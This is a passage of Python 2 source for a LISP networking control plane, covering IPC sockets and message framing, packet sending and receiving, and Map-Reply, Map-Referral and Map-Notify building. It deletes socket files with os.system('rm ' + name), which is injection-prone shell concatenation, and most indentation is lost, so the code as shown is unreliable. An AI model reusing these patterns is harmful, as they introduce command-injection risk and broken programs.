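# Illustrative example (comment only, a1/a2/a3 are hypothetical longword
# integers): for SHA-1-96 the three longwords are zero-filled to 16, 16, and
# 8 hex characters, so the returned string is always 40 characters long
# regardless of leading zeros:
#
#   auth = lisp_concat_auth_data(LISP_SHA_1_96_ALG_ID, a1, a2, a3, "")
#   len(auth)                         # 40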
#
# lisp_open_listen_socket
#
# Open either an internal socket or a network socket. A network socket can
# be opened with a local address of 0::0, which means the one socket can be
# used for both IPv4 and IPv6, reducing the number of threads required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
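#
# Illustrative usage (comment only, hypothetical socket names): a numeric
# port string opens a UDP network socket; a non-numeric port is treated as
# an AF_UNIX pathname:
#
#   ctrl = lisp_open_listen_socket("0.0.0.0", "4342")
#   ipc = lisp_open_listen_socket("", "lisp-ipc-example")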
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be sourced from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for an API message. Note this API IPC message must
# have the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
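#
# Illustrative encodings (comment only, hypothetical payloads) produced by
# the IPC builders above; four "@"-separated fields precede the payload and
# a double @ denotes a null port:
#
#   lisp_packet_ipc(pkt, "lisp-itr", 4342)  "packet@<len>@lisp-itr@4342@<pkt>"
#   lisp_command_ipc(cmd, "lisp-core")      "command@<len>@lisp-core@@<cmd>"
#   lisp_api_ipc("lisp-core", data)         "api@<len>@lisp-core@@<data>"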
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running.
# We need to send in segments since the socket interface will not accept
# arbitrarily large messages, and socket.setsockopt() won't allow us to
# increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
    length = len(packet)
    while (offset < length):
        new += packet[offset:offset+8] + " "
        offset += 8
    #endwhile
return(new)
#enddef
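#
# Illustrative output (comment only, hypothetical bytes): each group of 8
# hex characters (4 bytes) is followed by a space:
#
#   lisp_format_packet("\x10\x00\x00\x01\xde\xad\xbe\xef")
#                                     # returns "10000001 deadbeef "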
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
    # If Map-Request/Reply RLOC-probe, set TTL for outgoing packet to
    # LISP_RLOC_PROBE_TTL.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 128)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
    # If the total length is equal to the segment length, we only have one
    # segment, which is the entire packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
        # The sender gave up and sent a new message that made it to us; the
        # last partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# Rejoin the payload array elements, inserting a 0x40 ("@") between each one.
# This is a bit-stuffing procedure that restores payload bytes that split()
# consumed as IPC separators.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
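#
# Illustrative example (comment only, hypothetical segments): if a payload
# contained 0x40 bytes, split("@") broke it apart; lisp_bit_stuff() rejoins
# the pieces:
#
#   lisp_bit_stuff(["\x12\x34", "\x56"])    # returns "\x12\x34\x40\x56"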
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
        # This is a packet received on the network. If it was fragmented at
        # the sender, then IP did it, so it is assembled into a complete
        # datagram by this system.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
            # So go to the payload and put in 0x40 where split() separated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None): probing_rloc = rloc_entry.rloc
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
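#
# Illustrative call (comment only, hypothetical arguments): a proxy Map-Reply
# for a registered site with a 24-hour TTL and no action:
#
#   packet = lisp_build_map_reply(site_eid.eid, site_eid.group,
#       site_eid.registered_rlocs, map_request.nonce, LISP_NO_ACTION, 1440,
#       map_request, None, False, False)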
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
    # we are an ETR not behind a NAT, we want to return the RLOC-probe
    # Map-Reply to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp in building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
    #endfor
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
    # Check the case where an ETR included a local RLOC and may be behind
    # the same NAT as the requester. In this case, the requester can encap
    # directly to the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
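#
# Illustrative scenario (comment only, hypothetical RLOC-set): a site behind
# a NAT registers a private RLOC, a global RLOC, and an RTR at priority 254.
# An ITR requester receives [private-RLOC, RTR]; the RTR itself receives the
# non-254 RLOCs so it can encapsulate directly to the ETRs:
#
#   for_itr = lisp_get_partial_rloc_set(registered, itr_rloc, False)
#   for_rtr = lisp_get_partial_rloc_set(registered, rtr_rloc, False)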
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription is being requested; return a Map-Notify so the ITR knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
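#
# Illustrative sketch (comment only, not executed): only the first longword
# changes type from Map-Reply (2) to Map-Notify (4), and 4 zeroed bytes of
# Key-ID/Alg-ID/Auth-Length are inserted after the nonce:
#
#   notify_packet = lisp_convert_reply_to_notify(map_reply_packet)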
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
